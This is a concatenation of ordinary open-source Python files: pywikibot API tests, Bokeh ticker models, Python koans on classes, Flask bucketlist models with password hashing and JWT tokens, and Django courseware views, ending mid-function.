        fam = pywikibot.family.AutoFamily(
            'steward', 'https://steward.wikimedia.org/w/api.php')
        cls.site = pywikibot.site.APISite('steward', fam)
class TestLazyLoginNotExistUsername(TestLazyLoginBase):

    """Test missing username."""

    # FIXME: due to limitations of LoginManager, it will ask the user
    # for a password even if the username does not exist, and even if
    # pywikibot is not connected to a tty. T100964

    def setUp(self):
        """Patch the LoginManager to avoid UI interaction."""
        super(TestLazyLoginNotExistUsername, self).setUp()
        # Swap in a fake manager so no password prompt reaches the console;
        # restored in tearDown.
        self.orig_login_manager = pywikibot.data.api.LoginManager
        pywikibot.data.api.LoginManager = FakeLoginManager

    def tearDown(self):
        """Restore the original LoginManager."""
        pywikibot.data.api.LoginManager = self.orig_login_manager
        super(TestLazyLoginNotExistUsername, self).tearDown()

    def test_access_denied_notexist_username(self):
        """Test the query with a username which does not exist."""
        self.site._username = ['Not registered username', None]
        req = api.Request(site=self.site, parameters={'action': 'query'})
        self.assertRaises(pywikibot.NoUsername, req.submit)
        # FIXME: T100965
        # A second submit of the same request currently surfaces a raw
        # APIError instead of NoUsername.
        self.assertRaises(api.APIError, req.submit)
class TestLazyLoginNoUsername(TestLazyLoginBase):

    """Test no username."""

    def test_access_denied_no_username(self):
        """Test the query without a username."""
        self.site._username = [None, None]
        # FIXME: The following prevents LoginManager
        # from loading the username from the config when the site
        # username is None. i.e. site.login(user=None) means load
        # username from the configuration.
        if 'steward' in pywikibot.config.usernames:
            del pywikibot.config.usernames['steward']
        req = api.Request(site=self.site, parameters={'action': 'query'})
        self.assertRaises(pywikibot.NoUsername, req.submit)
        # FIXME: T100965
        # A second submit currently surfaces a raw APIError rather than
        # NoUsername.
        self.assertRaises(api.APIError, req.submit)
class TestBadTokenRecovery(TestCase):

    """Test that the request recovers from bad tokens."""

    family = 'wikipedia'
    code = 'test'

    # This test saves a page, i.e. it performs a write on the test wiki.
    write = True

    def test_bad_token(self):
        """Test the bad token recovery by corrupting the cache."""
        site = self.get_site()
        # Poison the cached edit token so the first save attempt fails and
        # the framework has to fetch a fresh token to succeed.
        site.tokens._tokens.setdefault(site.user(), {})['edit'] = 'INVALID'
        page = pywikibot.Page(site, 'Pywikibot bad token test')
        page.text = ('This page is testing whether pywikibot-core rerequests '
                     'a token when a badtoken error was received.')
        page.save(summary='Bad token test')
class TestUrlEncoding(TestCase):

    """Test encode_url() function."""

    net = False

    def _check(self, query, expected):
        """Encode *query* and verify both the result value and its type."""
        encoded = api.encode_url(query)
        self.assertEqual(encoded, expected)
        self.assertIsInstance(encoded, str)

    def test_url_encoding_from_list(self):
        """Test moving 'token' parameters from a list to the end."""
        query = [('action', 'edit'), ('token', 'a'), ('supertoken', 'b'),
                 ('text', 'text')]
        self._check(query, 'action=edit&text=text&token=a&supertoken=b')

    def test_url_encoding_from_dict(self):
        """Test moving 'token' parameters from a dict to the end."""
        # do not add other keys because dictionary is not deterministic
        self._check({'supertoken': 'b', 'text': 'text'},
                    'text=text&supertoken=b')

    def test_url_encoding_from_unicode(self):
        """Test encoding unicode values."""
        self._check({'token': 'токен'},
                    'token=%D1%82%D0%BE%D0%BA%D0%B5%D0%BD')

    def test_url_encoding_from_basestring(self):
        """Test encoding basestring values."""
        if PY2:
            query = {'token': str('test\xe2\x80\x94test'.encode('utf-8'))}
        else:
            query = {'token': 'test\xe2\x80\x94test'}
        self._check(query, str('token=test%C3%A2%C2%80%C2%94test'))

    def test_moving_special_tokens(self):
        """Test moving wpEditToken to the very end."""
        self._check({'wpEditToken': 'c', 'token': 'b', 'text': 'a'},
                    'text=a&token=b&wpEditToken=c')
if __name__ == '__main__':
    try:
        unittest.main()
    except SystemExit:
        # unittest.main() signals completion by raising SystemExit;
        # swallow it so wrappers importing this module exit cleanly.
        pass
| {
"content_hash": "a6dd54812f0a6e97ad1495e9fecaa919",
"timestamp": "",
"source": "github",
"line_count": 1032,
"max_line_length": 94,
"avg_line_length": 37.87112403100775,
"alnum_prop": 0.584397308292608,
"repo_name": "h4ck3rm1k3/pywikibot-core",
"id": "3e3e61a0b873ca4b868279eda88feba95c52914b",
"size": "39116",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/api_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "97"
},
{
"name": "Python",
"bytes": "4210758"
},
{
"name": "Shell",
"bytes": "659"
}
],
"symlink_target": ""
} |
""" Models for computing good tick locations on different kinds
of plots.
"""
from __future__ import absolute_import
from ..plot_object import PlotObject
from ..properties import abstract
from ..properties import Int, Float, Seq, Instance
@abstract
class Ticker(PlotObject):
    """ A base class for all ticker types. ``Ticker`` is
    not generally useful to instantiate on its own.

    """

    num_minor_ticks = Int(5, help="""
    The number of minor tick positions to generate between
    adjacent major tick values.
    """)

    desired_num_ticks = Int(6, help="""
    A desired target number of major tick positions to generate across
    the plot range.

    .. note::
        This value is a suggestion, and ticker subclasses may ignore
        it entirely, or use it only as an ideal goal to approach as well
        as can be, in the context of a specific ticking strategy.

    """)
class FixedTicker(Ticker):
    """ Generate ticks at fixed, explicitly supplied locations.

    .. note::
        The ``desired_num_ticks`` property is ignored by this Ticker.

    """

    # Explicit positions only; no tick computation is performed.
    ticks = Seq(Float, help="""
    List of tick locations.
    """)
class AdaptiveTicker(Ticker):
    """ Generate "nice" round ticks at any magnitude.

    Creates ticks that are "base" multiples of a set of given
    mantissas. For example, with ``base=10`` and
    ``mantissas=[1, 2, 5]``, the ticker will generate the sequence::

        ..., 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100, ...

    """

    base = Float(10.0, help="""
    The multiplier to use for scaling mantissas.
    """)

    # NOTE(review): the default ([2, 5, 10]) differs from the docstring
    # example ([1, 2, 5]) -- presumably intentional; confirm.
    mantissas = Seq(Float, [2, 5, 10], help="""
    The acceptable list numbers to generate multiples of.
    """)

    min_interval = Float(0.0, help="""
    The smallest allowable interval between two adjacent ticks.
    """)

    # Defaults to infinity, i.e. unbounded.
    max_interval = Float(float('Inf'), help="""
    The largest allowable interval between two adjacent ticks.
    """)
class CompositeTicker(Ticker):
    """ Combine different tickers at different scales.

    Uses the ``min_interval`` and ``max_interval`` interval attributes
    of the tickers to select the appropriate ticker at different
    scales.
    """

    # Ordering matters: tickers must be sorted by the scale they cover.
    tickers = Seq(Instance(Ticker), help="""
    A list of Ticker objects to combine at different scales in order
    to generate tick values. The supplied tickers should be in order.
    Specifically, if S comes before T, then it should be the case that::

        S.get_max_interval() < T.get_min_interval()

    """)
class SingleIntervalTicker(Ticker):
    """ Generate evenly spaced ticks at a fixed interval regardless of
    scale.
    """

    # No default: the interval must be supplied by the user.
    interval = Float(help="""
    The interval between adjacent ticks.
    """)
class DaysTicker(SingleIntervalTicker):
    """ Generate ticks spaced apart by specific, even multiples of days.
    """

    days = Seq(Int, help="""
    The intervals of days to use.
    """)
class MonthsTicker(SingleIntervalTicker):
    """ Generate ticks spaced apart by specific, even multiples of months.
    """

    months = Seq(Int, help="""
    The intervals of months to use.
    """)
class YearsTicker(SingleIntervalTicker):
    """ Generate ticks spaced apart even numbers of years.
    """
    # No extra properties; behavior is defined by the ticker implementation.
class BasicTicker(AdaptiveTicker):
    """ Generate ticks on a linear scale.

    .. note::
        This class may be renamed to ``LinearTicker`` in the future.
    """
class LogTicker(AdaptiveTicker):
    """ Generate ticks on a log scale.
    """
    # Inherits all configuration from AdaptiveTicker.
class CategoricalTicker(Ticker):
    """ Generate ticks for categorical ranges.
    """
    # Marker model: no additional configurable properties.
class DatetimeTicker(Ticker):
    """ Generate nice ticks across different date and time scales.
    """
    # Marker model: no additional configurable properties.
| {
"content_hash": "4e2436a0f147d63122743da008e1f5be",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 74,
"avg_line_length": 25.615384615384617,
"alnum_prop": 0.6562926562926563,
"repo_name": "gpfreitas/bokeh",
"id": "6818b1771cee6d0efba463a134489a2dda02c178",
"size": "3663",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/models/tickers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5455"
},
{
"name": "CSS",
"bytes": "413470"
},
{
"name": "CoffeeScript",
"bytes": "2117773"
},
{
"name": "HTML",
"bytes": "72852"
},
{
"name": "JavaScript",
"bytes": "7337"
},
{
"name": "Makefile",
"bytes": "5785"
},
{
"name": "Python",
"bytes": "1560447"
},
{
"name": "Shell",
"bytes": "18109"
}
],
"symlink_target": ""
} |
from runner.koan import *
class AboutClasses(Koan):
    # Koans exploring class definition, attributes, properties,
    # constructors, self, and the str()/repr() protocols.

    class Dog(object):
        "Dogs need regular walkies. Never, ever let them drive."

    def test_instances_of_classes_can_be_created_adding_parentheses(self):
        fido = self.Dog()
        self.assertEqual('Dog', fido.__class__.__name__)

    def test_classes_have_docstrings(self):
        self.assertMatch("Dogs need regular walkies. Never, "+
                         "ever let them drive.", self.Dog.__doc__)

    # ------------------------------------------------------------------

    class Dog2(object):
        def __init__(self):
            self._name = 'Paul'

        def set_name(self, a_name):
            self._name = a_name

    def test_init_method_is_the_constructor(self):
        dog = self.Dog2()
        self.assertEqual('Paul', dog._name)

    def test_private_attributes_are_not_really_private(self):
        dog = self.Dog2()
        dog.set_name("Fido")
        self.assertEqual('Fido', dog._name)
        # The _ prefix in _name implies private ownership, but nothing is truly
        # private in Python.

    def test_you_can_also_access_the_value_out_using_getattr_and_dict(self):
        fido = self.Dog2()
        fido.set_name("Fido")
        self.assertEqual('Fido', getattr(fido, "_name"))
        # getattr(), setattr() and delattr() are a way of accessing attributes
        # by method rather than through assignment operators
        self.assertEqual('Fido', fido.__dict__["_name"])
        # Yes, this works here, but don't rely on the __dict__ object! Some
        # class implementations use optimization which result in __dict__ not
        # showing everything.

    # ------------------------------------------------------------------

    class Dog3(object):
        def __init__(self):
            self._name = None

        def set_name(self, a_name):
            self._name = a_name

        def get_name(self):
            return self._name

        # Classic property(): wires attribute access to getter/setter.
        name = property(get_name, set_name)

    def test_that_name_can_be_read_as_a_property(self):
        fido = self.Dog3()
        fido.set_name("Fido")
        self.assertEqual('Fido', fido.get_name())  # access as method
        self.assertEqual('Fido', fido.name)  # access as property

    # ------------------------------------------------------------------

    class Dog4(object):
        def __init__(self):
            self._name = None

        @property
        def name(self):
            return self._name

        @name.setter
        def name(self, a_name):
            self._name = a_name

    def test_creating_properties_with_decorators_is_slightly_easier(self):
        fido = self.Dog4()
        fido.name = "Fido"
        self.assertEqual('Fido', fido.name)

    # ------------------------------------------------------------------

    class Dog5(object):
        def __init__(self, initial_name):
            self._name = initial_name

        @property
        def name(self):
            return self._name

    def test_init_provides_initial_values_for_instance_variables(self):
        fido = self.Dog5("Fido")
        self.assertEqual('Fido', fido.name)

    def test_args_must_match_init(self):
        self.assertRaises(TypeError, self.Dog5)  # Evaluates self.Dog5()

        # THINK ABOUT IT:
        # Why is this so?

    def test_different_objects_have_different_instance_variables(self):
        fido = self.Dog5("Fido")
        rover = self.Dog5("Rover")

        self.assertEqual(False, rover.name == fido.name)

    # ------------------------------------------------------------------

    class Dog6(object):
        def __init__(self, initial_name):
            self._name = initial_name

        def get_self(self):
            return self

        # Deliberately fixed: __str__ ignores _name (see the str() koans).
        def __str__(self):
            return 'Fido'

        def __repr__(self):
            return "<Dog named '" + self._name + "'>"

    def test_inside_a_method_self_refers_to_the_containing_object(self):
        fido = self.Dog6("Fido")

        self.assertEqual(fido, fido.get_self())  # Not a string!

    def test_str_provides_a_string_version_of_the_object(self):
        fido = self.Dog6("Fido")

        self.assertEqual("Fido", str(fido))

    def test_str_is_used_explicitly_in_string_interpolation(self):
        fido = self.Dog6("Fido")

        self.assertEqual('My dog is Fido', "My dog is " + str(fido))

    def test_repr_provides_a_more_complete_string_version(self):
        fido = self.Dog6("Fido")
        self.assertEqual("<Dog named 'Fido'>", repr(fido))

    def test_all_objects_support_str_and_repr(self):
        seq = [1, 2, 3]

        self.assertEqual('[1, 2, 3]', str(seq))
        self.assertEqual('[1, 2, 3]', repr(seq))

        self.assertEqual('STRING', str("STRING"))
        self.assertEqual("'STRING'", repr("STRING"))
| {
"content_hash": "64ac6991ee51b0745322f161a7128c83",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 79,
"avg_line_length": 31.038709677419355,
"alnum_prop": 0.5364789025150696,
"repo_name": "topliceanu/learn",
"id": "2d2a473efa44006a83cdde4b6a896392a34a16e7",
"size": "4858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/python_koans/python2/koans/about_classes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2259"
},
{
"name": "C",
"bytes": "50301"
},
{
"name": "CSS",
"bytes": "2376"
},
{
"name": "Clojure",
"bytes": "40105"
},
{
"name": "DIGITAL Command Language",
"bytes": "191608"
},
{
"name": "Dockerfile",
"bytes": "557"
},
{
"name": "Elm",
"bytes": "35974"
},
{
"name": "Forth",
"bytes": "128"
},
{
"name": "Go",
"bytes": "277187"
},
{
"name": "HTML",
"bytes": "750204"
},
{
"name": "Haskell",
"bytes": "57709"
},
{
"name": "JavaScript",
"bytes": "3327208"
},
{
"name": "Makefile",
"bytes": "3280"
},
{
"name": "OCaml",
"bytes": "157277"
},
{
"name": "PowerShell",
"bytes": "3022"
},
{
"name": "Procfile",
"bytes": "230"
},
{
"name": "Pug",
"bytes": "846"
},
{
"name": "Python",
"bytes": "1383229"
},
{
"name": "Racket",
"bytes": "7552"
},
{
"name": "Reason",
"bytes": "43"
},
{
"name": "Roff",
"bytes": "116"
},
{
"name": "Ruby",
"bytes": "134845"
},
{
"name": "Rust",
"bytes": "146828"
},
{
"name": "Shell",
"bytes": "9006"
},
{
"name": "Solidity",
"bytes": "1347"
},
{
"name": "TypeScript",
"bytes": "254"
},
{
"name": "Vue",
"bytes": "1504"
}
],
"symlink_target": ""
} |
from flask_sqlalchemy import SQLAlchemy
from application import app, db, SECRET_KEY
from sqlalchemy.sql import func
import bcrypt
import jwt
from datetime import datetime, timedelta
class User(db.Model):
    """ Creates users on the system """
    __tablename__ = "users"
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True)
    email = db.Column(db.String(120), unique=True)
    # bcrypt hash produced by set_password().
    password = db.Column(db.String)
    bucketlists = db.relationship('Bucketlist', backref='author', lazy='dynamic')

    def set_password(self, password):
        """ Hash and set the new user's password. """
        hashed_password = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
        self.password = hashed_password

    def check_password(self, password):
        """ Check a candidate password against the stored hash at login. """
        # bcrypt.checkpw already returns a bool, so return it directly.
        # NOTE(review): assumes self.password round-trips from the DB as
        # bytes -- confirm the String column preserves that.
        return bcrypt.checkpw(password.encode(), self.password)

    def generate_auth(self):
        """ Generate a JWT authentication token valid for 600 seconds. """
        payload = {'id': self.id,
                   'exp': datetime.utcnow() + timedelta(seconds=600),
                   "iat": datetime.utcnow()
                   }
        # encode payload and return auth_token
        auth_token = jwt.encode(payload, SECRET_KEY).decode()
        return auth_token

    def save(self):
        """ Save a user into the database """
        db.session.add(self)
        db.session.commit()

    def __repr__(self):
        return '<User %r>' % self.username
class Bucketlist(db.Model):
    """ creates bucket lists """
    __tablename__ = 'bucketlists'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80))
    # NOTE(review): column type is Integer but the foreign key targets
    # users.email, which is a String(120) -- confirm intent; users.id
    # looks more likely. Left unchanged to avoid a schema migration.
    created_by = db.Column(db.Integer, db.ForeignKey('users.email'))
    # BUG FIX: pass the callable (not its result) so the timestamp is
    # computed per row; datetime.utcnow() would be evaluated once at
    # import time and stored for every row.
    date_created = db.Column(db.DateTime, default=datetime.utcnow)
    date_modified = db.Column(db.DateTime, onupdate=datetime.utcnow)
    items = db.relationship('Item', backref='bucketlist', lazy='dynamic')

    def save(self):
        """ Save a bucketlist into the database """
        db.session.add(self)
        db.session.commit()

    def delete(self):
        """ delete a bucketlist from the database """
        db.session.delete(self)
        db.session.commit()

    def __repr__(self):
        return '<Bucketlist %r>' % self.name
class Item(db.Model):
    """ Creates bucketlist items """
    __tablename__ = 'items'
    id = db.Column(db.Integer, primary_key=True)
    description = db.Column(db.String(120))
    # NOTE(review): completion flag stored as the string "False"/"True"
    # rather than db.Boolean -- kept as-is since changing it would require
    # a schema migration and updates to every reader.
    is_done = db.Column(db.String, default="False")
    # BUG FIX: pass the callable (not its result) so the timestamp is
    # computed per row instead of once at import time.
    date_created = db.Column(db.DateTime, default=datetime.utcnow)
    date_modified = db.Column(db.DateTime, onupdate=datetime.utcnow)
    bucketlist_id = db.Column(db.Integer, db.ForeignKey('bucketlists.id'))

    def save(self):
        """ Save an item into the database """
        db.session.add(self)
        db.session.commit()

    def delete(self):
        """ delete an item from database """
        db.session.delete(self)
        db.session.commit()

    def __repr__(self):
        return '<item %r>' % self.description
| {
"content_hash": "4411a38056504ea20eb06e24b89f617f",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 82,
"avg_line_length": 31.397959183673468,
"alnum_prop": 0.6243093922651933,
"repo_name": "bmwachajr/bucketlist",
"id": "64dca552c105c53c5f52b97cef1a7bbcbe8b84ad",
"size": "3077",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "application/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53425"
}
],
"symlink_target": ""
} |
"""
This file basically contains viewsets for the courseware API
Category API:
- List, Create, Update, Retrieve, Destroy, Partial Update Category
- Get all courses in a category
- Add a course in that category
Course API:
- Retrieve, Update, Partial Update, Destroy info of a course
- Retrieve, Update, Partial update courseinfo
- List all the students in a course with their history
    - Create, update, partial update, Retrieve course history
- List all concepts in a course
- Create, Retrieve, Update, Partial Update a concept
CourseHistory API:
- List all the concept history in that coursehistory
Concept API:
- Destroy a concept
- Retrieve, Update Concept history
- playlist
- Create a learning element
"""
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from elearning_academy.permissions import InInstructorOrContentDeveloperMode, get_mode
from elearning_academy.permissions import InInstructorMode, InContentDeveloperMode
from courseware.models import Course, CourseHistory
from courseware.vsserializers.course import CourseSerializer, CourseInfoSerializer
from rest_framework import status
from django.http import HttpResponse
import json
from django.utils import timezone
# Module-level permission-checker instances shared by the views below.
inInstructorOrContentDeveloperModeObject = InInstructorOrContentDeveloperMode()
inInstructorModeObject = InInstructorMode()
inContentDeveloperModeObject = InContentDeveloperMode()
def parent_categories(request):
    """Render the top-level category listing page."""
    return render(request, "category/parent_categories.html",
                  {"request": request})
def categories(request, pk):
    """Render the category page for the category with primary key *pk*."""
    return render(request, "category/categories.html",
                  {"request": request, "pk": pk})
@login_required
def add_course(request):
    """Render the course-creation page; instructors only."""
    # Guard clause: non-instructors get the generic error page.
    if not request.user.get_profile().is_instructor:
        return render(request, "error.html", {
            "request": request,
            "error": "You have to be an instructor to add a course."
        })
    return render(request, "course/course_admin.html", {"request": request})
def courses(request, pk):
    """Render the course list belonging to the category *pk*."""
    return render(request, "category/courses.html",
                  {"request": request, 'pk': pk})
@login_required
def course(request, pk=None, ref=None):
    """Serve a course's main page.

    Owners in instructor/content-developer mode get the authoring view and
    other enrollees the student view. Users with no active enrollment get
    the public course-information page in student mode, or 403 otherwise.
    """
    _course = get_object_or_404(Course, pk=pk)
    context = {"request": request, "course": _course}
    # "-1" is the sentinel the templates use for "no referrer".
    if ref is not None and len(ref) > 0:
        context["ref"] = ref
    else:
        context["ref"] = "-1"
    mode = get_mode(request)
    history = CourseHistory.objects.filter(user=request.user, course=_course, active='A')
    if mode == 'I' or mode == 'C':
        if len(history) > 0:
            if history[0].is_owner:
                return render(request, "content_developer/course.html", context)
            return render(request, "student/course.html", context)
    else:
        if len(history) > 0:
            return render(request, "student/course.html", context)
        # Not enrolled: show the public course information page with
        # human-readable dates.
        course_data = CourseSerializer(_course).data
        date_format = '%d %b,%Y'
        if course_data['course_info']['start_time']:
            s_date = course_data['course_info']['start_time'].strftime(date_format)
            course_data['course_info']['start_time'] = s_date
        if course_data['course_info']['end_time']:
            e_date = course_data['course_info']['end_time'].strftime(date_format)
            course_data['course_info']['end_time'] = e_date
        if course_data['course_info']['end_enrollment_date']:
            end_e_date = course_data['course_info']['end_enrollment_date'].strftime(date_format)
            course_data['course_info']['end_enrollment_date'] = end_e_date
        context = {
            "request": request,
            "title": course_data['title'],
            "course": json.dumps(course_data),
            "course_info": json.dumps(course_data['course_info'])
        }
        return render(request, "course/public_course_info.html", context)
    # Reached only by instructors/content developers with no active history.
    # BUG FIX: 403 must be passed as the ``status`` keyword -- the second
    # positional argument of HttpResponse is ``content_type``.
    return HttpResponse("Forbidden", status=status.HTTP_403_FORBIDDEN)
@login_required
def syllabus(request, pk=None):
    """Serve the syllabus page of a course; instructors only."""
    _course = get_object_or_404(Course, pk=pk)
    if request.user.get_profile().is_instructor:
        return render(request, "instructor/syllabus.html",
                      {"request": request, "course": _course})
    return render(request, "error.html", {
        "request": request,
        "error": "You have to be an instructor to see syllabus."
    })
@login_required
def student_courses(request):
    """Serve the list of courses the current student is enrolled in."""
    enrolled = student_course_list(request)
    return render(request, "student/my_courses.html",
                  {"data": json.dumps(enrolled)})
@login_required
def instructor_courses(request):
    """Serve the list of courses offered by the current instructor.

    (Added by vinayak, needs to be verified from the writer of
    instructor_course_list().)
    """
    # Guard clause: reject users not in instructor mode.
    if not inInstructorModeObject.has_permission(request, None):
        return render(request, "error.html", {
            "request": request,
            "error": "Invalid Access. Change mode or contact admin"
        })
    offerings = instructor_course_list(request)
    return render(request, "instructor/my_offerings.html",
                  {"data": json.dumps(offerings)})
@login_required
def content_developer_courses(request):
    """
    Serve the textbook course list for a content developer.

    Users not in content-developer mode get the generic error page.
    """
    if inContentDeveloperModeObject.has_permission(request, None):
        response = content_developer_course_list(request)
        context = {"data": json.dumps(response)}
        #: Need to change the page for content developer courses
        # BUG FIX: removed leftover debug statement `print "New Textbook Page"`.
        return render(request, "content_developer/my_textbooks.html", context)
    else:
        context = {
            "request": request,
            # BUG FIX: added the missing space after the period in the
            # user-facing error message.
            "error": "Invalid Access. Change mode or contact admin"
        }
        return render(request, "error.html", context)
@login_required
def mycourselist(request):
    """
    Dispatch to the course list matching the user's current mode.

    Instructor mode ('I') -> offered courses, content-developer mode ('C')
    -> textbooks, anything else -> the student's enrolled courses.
    (Original author flagged this view as possibly obsolete.)
    """
    mode = get_mode(request)
    if mode == 'I':
        return instructor_courses(request)
    elif mode == 'C':
        return content_developer_courses(request)
    # Default: treat every other mode as a student.
    return student_courses(request)
@login_required
def content_developer_course_list(request):
    """
    Return a list of courses being developed by user as a content developer.

    Each entry merges the serialized course data with a completion
    percentage, a status tag and display-formatted start/end dates.
    """
    date_format = "%d %b, %Y"
    history_list = CourseHistory.objects.filter(user=request.user, is_owner=True, course__type='T')
    # The queryset already restricts to textbook ('T') courses, so no
    # further per-row type check is needed.
    all_courses = [history.course for history in history_list]
    all_courses_data = [CourseSerializer(c).data for c in all_courses]
    cur_datetime = timezone.now().date()
    # Course current status in coursetag:
    #   1 => active, 2 => future, 3 => past
    all_coursetag = []
    start_date = []
    all_course_progress = []
    for c_data in all_courses_data:
        c_info = c_data['course_info']
        if (c_info['end_time'] is None or cur_datetime < c_info['start_time']):
            tag = 2
        elif (cur_datetime > c_info['end_time']):
            tag = 3
        else:
            tag = 1
        all_coursetag.append({"is_published": c_info['is_published'], "coursetag": tag})
        if c_info['end_time'] is None or c_info['start_time'] is None:
            progress = 0
        else:
            elapsed_time = (cur_datetime - c_info['start_time']).days
            total_time = (c_info['end_time'] - c_info['start_time']).days
            # BUG FIX: guard against a zero-length course, which previously
            # raised ZeroDivisionError.
            if total_time > 0:
                progress = float(100 * elapsed_time / total_time)
            else:
                progress = 100 if elapsed_time >= 0 else 0
            if progress > 100:
                progress = 100
            elif progress < 0:
                progress = 0
        all_course_progress.append({"progress": progress})
        if (c_info['start_time'] is not None):
            s_date = c_info['start_time'].strftime(date_format)
            c_data['course_info']['start_time'] = s_date
        else:
            s_date = "Not Decided"
        if (c_info['end_time'] is not None):
            e_date = c_info['end_time'].strftime(date_format)
            c_data['course_info']['end_time'] = e_date
        else:
            e_date = "Not Decided"
        start_date.append({
            "start_date": s_date,
            "end_date": e_date,
            "start_time": s_date,
            "end_time": e_date
        })
        if (c_info['end_enrollment_date']):
            end_e_date = c_info['end_enrollment_date'].strftime(date_format)
            c_data['course_info']['end_enrollment_date'] = end_e_date
    # Merge the parallel per-course dicts into a single record per course.
    response = []
    for i in range(len(all_courses_data)):
        response.append((dict(all_course_progress[i].items() + all_coursetag[i].items() +
                              all_courses_data[i].items() + start_date[i].items())))
    response = sort_my_courses(response)
    return response
@login_required
def instructor_course_list(request):
    """
    Return a list of courses which are offered by the user as instructor.

    Each entry merges the serialized course data with:
      * "coursetag"    -- 1 = active, 2 = future, 3 = past
      * "is_published" -- copied from the course info
      * "progress"     -- percentage of the course duration elapsed, in [0, 100]
      * "start_date"/"end_date" and "start_time"/"end_time" -- printable
        dates in "%d %b, %Y" format, or "Not Decided" when unknown
    The list is ordered via sort_my_courses().
    """
    date_format = "%d %b, %Y"
    history_list = CourseHistory.objects.filter(user=request.user, is_owner=True, course__type='O')
    all_courses = [history.course for history in history_list if history.course.type == 'O']
    all_courses_data = [CourseSerializer(c).data for c in all_courses]
    cur_datetime = timezone.now().date()
    response = []
    for c_data in all_courses_data:
        c_info = c_data['course_info']
        start = c_info['start_time']
        end = c_info['end_time']
        # Course status tag: 1 => active, 2 => future, 3 => past.
        if end is None or cur_datetime < start:
            tag = 2
        elif cur_datetime > end:
            tag = 3
        else:
            tag = 1
        # Elapsed fraction of the course duration, clamped to [0, 100].
        # Guard unknown dates and a zero-day duration (the previous code
        # raised ZeroDivisionError when start == end); 100.0 forces true
        # division on Python 2 as well.
        if start is None or end is None or (end - start).days == 0:
            progress = 0
        else:
            progress = 100.0 * (cur_datetime - start).days / (end - start).days
            progress = max(0, min(100, progress))
        # Printable dates; the serialized course_info is rewritten in place
        # so nested and top-level values agree.
        if start is not None:
            s_date = start.strftime(date_format)
            c_info['start_time'] = s_date
        else:
            s_date = "Not Decided"
        if end is not None:
            e_date = end.strftime(date_format)
            c_info['end_time'] = e_date
        else:
            e_date = "Not Decided"
        if c_info['end_enrollment_date']:
            c_info['end_enrollment_date'] = c_info['end_enrollment_date'].strftime(date_format)
        # Merge the pieces; later updates win on key collisions, matching the
        # precedence of the original dict(a.items() + b.items() + ...) merge.
        # Explicit update() calls also work on Python 3, where dict views
        # cannot be concatenated with '+'.
        entry = {"progress": progress, "is_published": c_info['is_published'], "coursetag": tag}
        entry.update(c_data)
        entry.update({"start_date": s_date, "end_date": e_date,
                      "start_time": s_date, "end_time": e_date})
        response.append(entry)
    return sort_my_courses(response)
@login_required
def student_course_list(request):
    """
    Return a list of all courses where the student is enrolled.

    Each entry merges the serialized course data with:
      * "coursetag"    -- 1 = active, 2 = future, 3 = past
      * "is_published" -- copied from the course info
      * "progress"     -- percentage of the course duration elapsed, in [0, 100]
      * "start_date"/"end_date" and "start_time"/"end_time" -- printable
        dates in "%d %b, %Y" format, or "Not Decided" when unknown
    The list is ordered via sort_my_courses().
    """
    date_format = "%d %b, %Y"
    history_list = CourseHistory.objects.filter(user=request.user, active='A', is_owner=False)
    all_courses = [history.course for history in history_list if history.course.type == 'O']
    all_courses_data = [CourseSerializer(c).data for c in all_courses]
    cur_datetime = timezone.now().date()
    response = []
    for c_data in all_courses_data:
        c_info = c_data['course_info']
        start = c_info['start_time']
        end = c_info['end_time']
        # Course status tag: 1 => active, 2 => future, 3 => past.
        if end is None or cur_datetime < start:
            tag = 2
        elif cur_datetime > end:
            tag = 3
        else:
            tag = 1
        # Elapsed fraction of the course duration, clamped to [0, 100].
        # Guard unknown dates and a zero-day duration (the previous code
        # raised ZeroDivisionError when start == end); 100.0 forces true
        # division on Python 2 as well.
        if start is None or end is None or (end - start).days == 0:
            progress = 0
        else:
            progress = 100.0 * (cur_datetime - start).days / (end - start).days
            progress = max(0, min(100, progress))
        # Printable dates; the serialized course_info is rewritten in place
        # so nested and top-level values agree.
        if start is not None:
            s_date = start.strftime(date_format)
            c_info['start_time'] = s_date
        else:
            s_date = "Not Decided"
        if end is not None:
            e_date = end.strftime(date_format)
            c_info['end_time'] = e_date
        else:
            e_date = "Not Decided"
        if c_info['end_enrollment_date']:
            c_info['end_enrollment_date'] = c_info['end_enrollment_date'].strftime(date_format)
        # Merge the pieces; later updates win on key collisions, matching the
        # precedence of the original dict(a.items() + b.items() + ...) merge.
        # Explicit update() calls also work on Python 3, where dict views
        # cannot be concatenated with '+'.
        entry = {"progress": progress, "is_published": c_info['is_published'], "coursetag": tag}
        entry.update(c_data)
        entry.update({"start_date": s_date, "end_date": e_date,
                      "start_time": s_date, "end_time": e_date})
        response.append(entry)
    return sort_my_courses(response)
def coursecmp(x, y):
    """
    Comparator for course summary dicts.

    Orders primarily by 'coursetag' (1 = active before 2 = future before
    3 = past), then by 'start_time' ascending.  Returns -1/0/1; ties now
    compare equal (the previous version returned 1 for equal elements,
    which is not a consistent comparator and defeats stable sorting).

    NOTE(review): 'start_time' holds formatted strings such as
    "05 Jan, 2020", so the secondary ordering is lexicographic rather than
    chronological -- preserved from the original behaviour.
    """
    if x['coursetag'] > y['coursetag']:
        return 1
    if x['coursetag'] < y['coursetag']:
        return -1
    xs = x['start_time']
    ys = y['start_time']
    if xs is not None and ys is not None:
        if xs < ys:
            return -1
        if xs > ys:
            return 1
    # Equal tags with equal or missing start times: treat as equivalent.
    return 0
def sort_my_courses(response):
    """
